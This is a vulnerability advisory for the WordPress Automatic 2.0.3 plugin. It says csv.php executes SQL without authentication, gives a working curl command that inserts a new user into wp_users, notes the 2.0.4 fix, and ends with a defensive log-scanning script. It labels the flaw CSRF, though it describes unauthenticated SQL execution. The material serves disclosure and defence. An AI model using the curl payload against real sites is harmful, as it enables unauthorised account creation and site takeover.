WordPress Automatic 2.0.3 Cross Site Request Forgery
WordPress Automatic Plugin v2.0.3 CSRF Exploit
The WordPress Automatic plugin posts quality targeted articles, Amazon products, ClickBank products, YouTube videos and feed posts on auto-pilot. Just install and leave; it will work 24/7* to blog for you.
The vulnerability occurs in the csv.php file, which does not require valid login credentials and can be used to execute SQL queries.
Using this cURL command, a user can send POST data that will create a new login:
$ curl --data "q=INSERT INTO \`wp_users\` (\`user_login\`, \`user_pass\`, \`user_email\`) VALUES ('test', '123456', 'firstname.lastname@example.org')" http://www.example.com/blog/wp-content/plugins/wp-automatic/inc/csv.php
The author of this plugin has released a fix for this vulnerability and users are urged to upgrade to v2.0.4.
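A defender's check for the request described above, as an added example that is not part of the original advisory: it scans web server access logs for requests to the plugin's csv.php and lists clients whose POST received a 2xx response. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Path taken from the advisory; a site prefix such as /blog may precede it.
TARGET = "/wp-content/plugins/wp-automatic/inc/csv.php"

# Assumption: Apache/nginx "combined" access log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_csv_php_hits(lines):
    """Return {client_ip: [(timestamp, method, status), ...]} for csv.php requests."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        # Drop the query string and undo percent-encoding before matching.
        path = unquote(m["uri"].split("?", 1)[0])
        if path.endswith(TARGET):
            hits[m["ip"]].append((m["ts"], m["method"], int(m["status"])))
    return dict(hits)

def likely_processed(hits):
    """Clients with a POST answered 2xx: the SQL in the body may have run."""
    return sorted(
        ip for ip, reqs in hits.items()
        if any(meth == "POST" and 200 <= st < 300 for _, meth, st in reqs)
    )

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [12/Mar/2013:10:01:22 +0000] "POST /blog/wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1" 200 15 "-" "curl/7.29.0"',
    '198.51.100.4 - - [12/Mar/2013:10:02:00 +0000] "GET /blog/wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Mar/2013:10:03:10 +0000] "POST /blog/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [12/Mar/2013:10:04:45 +0000] "POST /blog/wp-content/plugins/wp-automatic/%69nc/csv.php HTTP/1.1" 404 0 "-" "curl/7.29.0"',
]

if __name__ == "__main__":
    found = find_csv_php_hits(SAMPLE)
    for ip in likely_processed(found):
        print("review wp_users for unexpected accounts; POST 2xx from", ip, found[ip])
```

Access logs normally do not record the POST body, so a hit shows that csv.php was reached, not which query was sent; any client listed here is a reason to review wp_users for accounts nobody created.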